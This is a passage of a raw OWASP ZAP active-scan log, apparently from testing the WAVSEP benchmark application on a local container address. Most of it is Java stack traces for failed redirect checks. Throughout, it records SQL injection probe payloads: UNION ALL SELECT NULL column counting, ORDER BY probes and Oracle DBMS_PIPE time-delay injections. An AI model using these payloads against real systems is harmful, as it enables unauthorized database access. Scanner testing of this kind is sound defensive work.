org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681369 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681369 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5444=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(114)||CHR(109)||CHR(118),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5444=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(114)||CHR(109)||CHR(118),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681370 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681370 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8765=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(109)||CHR(86)||CHR(75),5)-- Lfpe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8765=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(109)||CHR(86)||CHR(75),5)-- Lfpe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681372 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681372 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681373 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681374 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 3344-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 3344-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681375 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681376 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681376 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681377 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681377 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 